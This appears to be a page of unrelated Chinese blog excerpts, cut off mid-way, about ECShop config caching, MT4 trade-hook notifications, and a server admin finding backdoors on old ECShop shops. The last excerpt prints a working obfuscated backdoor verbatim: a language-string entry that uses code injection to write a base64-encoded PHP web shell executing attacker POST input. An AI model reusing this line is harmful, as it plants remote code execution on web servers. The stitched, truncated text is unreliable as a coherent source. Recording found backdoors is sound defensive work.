ECShop的相关配置信息是保存在数据库的shop_config表中的。实际应用中,为了提高性能,避免反复的数据库读取操作,ECShop会把配置信息缓存在/temp/static_caches/shop_config.php文件中。相关功能是/includes/lib_common.php文件中的load_config函数实现的。如果读取缓存文件失败,则会从数据库中读取并将结果缓存在缓存文件中。
/**
* 读结果缓存文件
...
在MT4交易系统中,有时需要实现这样一种功能:
当客户下单/平仓/改单等相关订单操作时,第三方应用能得到即时通知,获取订单的相关信息,以便处理相应的业务。
我们可以利用MT4系统提供的Server Hook API(MtSrvTradesAdd、MtSrvTradesUpdate)来实现此功能。拦截相关订单操作,给指定的URL发送HTTP GET/POST消息通知(当然也可以以其它方式发送信息)。
...有个服务器没怎么管它,发现磁盘莫名奇妙的全满了。上面是一些ECShop商城,很久没更新了。ECShop本来漏洞就比较多,国内用的也多,估计好多人没事都在扫吧。。。
发现一些后门,记录下:
$_LANG['is_paid'] = "状态${${fputs(fopen(base64_decode(aW5kZS5waHA),w),base64_decode(PD9waHAgJGsgPSBzdHJfcmVwbGFjZSgiOSIsIiIsImE5czk5czllOXI5dCIpOyRrKCRfUE9TVFsiOSJdKTsgPz4))}}";
...